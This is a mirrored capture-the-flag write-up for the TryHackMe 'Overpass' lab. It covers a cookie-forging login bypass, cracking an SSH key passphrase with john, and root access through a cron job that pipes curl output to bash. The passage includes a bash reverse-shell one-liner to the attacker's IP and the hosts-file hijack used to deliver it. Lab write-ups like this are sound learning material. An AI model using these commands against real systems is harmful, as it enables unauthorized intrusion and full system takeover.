Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-09-20 06:11:56 +00:00
Code Issues Projects Releases Packages Wiki Activity
CTF-Writeups/TryHackMe/Overpass.md
AbdullahRizwan101 89cd7d5406
Add files via upload
2020-11-11 21:24:54 +05:00

5.9 KiB
Raw Permalink Blame History

TryHackMe-Overpass

NMAP

nmap -sC -sV 10.10.124.118
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 22:35 PKT
Nmap scan report for 10.10.124.118
Host is up (0.18s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
|   256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
|_  256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80

Download the file to see what's in it.

There's also a source code ingolang let's see maybe we can find something it in so we can exploit that binary.

Gobuster

root@kali:~/TryHackMe/Easy/Overpass# gobuster dir -u http://10.10.124.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.124.118
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/11/10 22:50:19 Starting gobuster
===============================================================
/img (Status: 301)
/downloads (Status: 301)
/aboutus (Status: 301)
/admin (Status: 301)
/css (Status: 301)

We see that there's an /admin page

Looking at the source we can see 3 javascript files , we are interested in login.js so let's view the source code

This is a vulnerabale piece of code that would make authenticate a user with invalid crdentials if he has a session so let's make a fake SessionToken with a browser extension named EditThisCookie

On refreshing the page we will get the ssh key for james

But it's asking for the passphrase of id_rsa so we can get the hash of id_rsa with ssh2john and crack it with johntheripper

root@kali:~/TryHackMe/Easy/Overpass# /usr/share/john/ssh2john.py id_rsa > ssh_hash
root@kali:~/TryHackMe/Easy/Overpass# john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
james13          (id_rsa)
1g 0:00:00:03 31.13% (ETA: 20:37:40) 0.3125g/s 1444Kp/s 1444Kc/s 1444KC/s play646..play47
Session aborted

Then ssh james@<ip> -i id_rsa

Privilege Escalation

Host linpeas.sh on local machine and transfer it to target machine

I didn't find anythin with linpeas so next thing that I looked at was a file .overpass in james's home directroy , reading the content of the file it was gibberish

,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.

I visited https://gchq.github.io/CyberChef/

This password is for james but still he is not in group sudoers

That was a rabbit hole then check for cronjobs

james@overpass-prod:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
# Update builds from latest code
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
james@overpass-prod:~$

looking at /etc/hosts we can change this localhost to our local machine's address and add a reverse shell in bash with path <our_vpn_ip>/downloads/src/buildscript.sh

james@overpass-prod:~$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 overpass-prod
127.0.0.1 overpass.thm
# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
james@overpass-prod:~$

Now making directory /downloads/src/buildscript.sh

root@kali:~/TryHackMe/Easy/Overpass# mkdir downloads
root@kali:~/TryHackMe/Easy/Overpass# cd downloads/
root@kali:~/TryHackMe/Easy/Overpass/downloads# mkdir src
root@kali:~/TryHackMe/Easy/Overpass/downloads# echo "bash -i >& /dev/tcp/10.14.3.143/8080 0>&1" > buildscript.sh
root@kali:~/TryHackMe/Easy/Overpass/downloads# chmod +x buildscript.sh

And just like that we will get the reverse shell as root !